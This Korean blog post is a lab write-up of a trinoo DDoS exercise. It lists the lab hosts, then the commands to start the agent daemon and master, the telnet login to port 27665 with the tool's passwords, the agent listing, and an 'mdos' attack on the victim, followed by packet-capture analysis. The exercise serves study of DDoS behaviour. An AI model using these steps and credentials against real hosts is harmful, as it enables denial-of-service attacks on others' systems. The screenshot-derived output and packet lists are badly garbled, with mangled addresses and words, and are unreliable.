2020. 7. 16.

[Network] trinoo 어택 실습


  1. 구성과 계획
  • 네트워크 구성도

master  att6 - 192.168.10.150/00:0c:29:a1:3f:e0
agent att6 - 192.168.10.149/00:0C:29:C6:9A:42
agent att5 - 192.168.10.148/00:0C:29:5D:87:05
피해자 winXP - 192.168.10.147/00:0c:29:26:42:b6

  • 과정 정리
step1. agent on
step2. master on
step3. telnet 접속 attack
step4. agent tcpdump
step5. wireshark 패킷 캡처

  1. 관련내용정리
trinoo : 1999 퍼지기 시작한 DDoS 프로그램으로 master에게 신호를 보내 많은 agent들이 공격하게 만든다.
agent : master로부터 명령을 받아 공격을 직접 수행하는 공격자
master : agent에게 명령을 보내는 명령자

  1. 실습과정
step1. agent on
/root/trinoo/master/daemon
step2. master on
/root/trinoo/master/master
gOrave
step3. telnet 접속 attack
telnet 192.168.10.150 27665
betaalmostdone
Croot@localhost telnet 192.168.1ø.15ø 27665 Tying 192.168.1e.1se... connected to 192.168.1ø.15ø. Escape character is ' beta a Imostdone trinoo vI.ø7d2+f3+c.. Crpm8d/cb4Sx/) trinoo>
로그인 상태
bcast
// 에이전트 목록 검색
mdos 192.168.10.147
// xp 공격
bcast trlnoo> Listing acasts . 192.168. la. 149 192.168.1ø.148 End. 2 acasts total. trinoo> mdos 192.168.1ø.147 Racketing 192.168.1ø.147.
에이전트 목록을 검색하고 공격하는 모습

step4. agent tcpdump
tcpdump -i eth0 -xX -w trinoo.cap
step5. wireshark 패킷 분석
wireshark on
  • filtering : ip.addr == 192.168.10.147
192.168. la. 147 192.168. la. 148 192.168.1ø.147 192.168.1ø.148 192.168.1a.148 192.168.1a.147 192.168. la. 148 192.168. la. 147 192.168 .12. 147 192.168 .12. 148 192.168.1a.148 192.168.1a.147 192.168.1a.148 192.168.1a.147 192.168 .12. 147 192.168 .12. 148 192.168.1a.148 192.168.1a.147 192.168. la. 148 192.168. la. 147 lcmp lcmp UDP LID p LID p UDP 74 74 74 74 Destini Destini 38%1 38%1 Cestim 38%1 38%1 Cestim 38%1 38%1
agent 공격패킷
  • filtering : ip.addr == 192.168.10.149
192. 168. 18. 149 192. 168. 18. 158 192. 168.18. 158 192. 168.18.149 192. 168.18.149 192. 168.18. 158 192.168 . 18.158 192. 168 . 18. 149 ış!2.1ö8.ıa.14E! ış!2.ıt58.ıa.15â TCP TCP TCP UDP 87 53926 98 27665 66 53926 73 54719 27665 53926 27665 27444 [PSH, ACK] Seq-ı Ack-ı idin-229 Len-21 TSvaı- [PSH, ACK] Seq-ı Ark-22 idin-227 Len-32 TSvaı [ACK] Seq-22 Ark-33 idin-229 Len-8 TSvaı-1889: Len-31 lâl Destination
149에서 150 master 로그인한 패킷과 명령을 보낸패킷이다.
οο 76 οο οο οο οο οο 40 34 οο 96 00 20 31 07 03 40 31 34 11 27 32 37 93 24 33 32 00 36 32 40 78 31 01 79 39 οο 72 32 f4 00 96 20 45 31 95 95 61 34 36 34 38 64 31 28 73 30 Ζ 144ads 1 123:19 2.168.10 .147:
icmp 패킷을 보면 명령어를 보낸것도 패킷으로 잡힌다.

  1. 결론
많은 agent 가진 ddos 위험도가 매우 높다.
공식적 대응방안으로는 내부의 좀비 PC 생기지 않도록 예방하는것이다.


시간:
라벨: ,

댓글 없음:

댓글 쓰기

피드 구독하기: 댓글 (Atom)